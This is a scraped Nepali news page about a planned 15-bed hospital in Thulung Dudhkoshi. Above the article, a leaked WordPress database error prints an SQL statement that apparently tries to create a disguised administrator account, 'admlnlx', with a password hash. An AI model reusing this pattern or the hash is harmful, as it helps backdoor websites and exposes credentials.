WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgUSOU6y8yT/6Agba4yEqp0UaWEkCw/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 08:03:55', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशी सुकेपोखरीमा १५ बेडको अस्पताल बन्ने – Gaule Khabar

थुलुङ दुधकोशी सुकेपोखरीमा १५ बेडको अस्पताल बन्ने

थुलुङ दुधकोशी सुकेपोखरीमा १५ बेडको अस्पताल बन्ने

काठमाण्डौ । थुलुङ दुधकोशी गाउँपालिका सुकेपोखरीमा १५ बेडको अस्पताल निर्माण हुने भएको छ । थुलुङ दुधकोशी गाउँपालिका ४, ५ र ९ लाई केन्द्रित गरेर थुलुङ दुधकोशी अस्पताल बन्न लागेको हो ।

१९ करोडको लागतमा अस्पताल निर्माण हुन लागेको गाउँपालिका अध्यक्ष असिम राईले जानकारी दिए । कोशी पारिका क्षेत्रका नागरिकलाई सामान्य उपचारका लागि पनि बाहिर जानुपर्ने बाध्यता अन्त्यका लागि अस्पताल स्थापना गर्न लागिएको पालिका अध्यक्ष राईको भनाई छ । मुक्लीमा निर्माणाधिन ५० बेडको दुधकोशी सामुदायिक अस्पताल असोज ५ गतेबाट विधिवत रुपमा सञ्चालनमा आउने जानकारी दिए ।शुक्रबार पालिका अध्यक्ष राईले लक्ष्मी बैंकको शाखारहित बैंकिङ सेवा, ग्रामीण स्वास्थ्य इकाइ र वडा कार्यालय भवनको उद्घाटन गरेका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका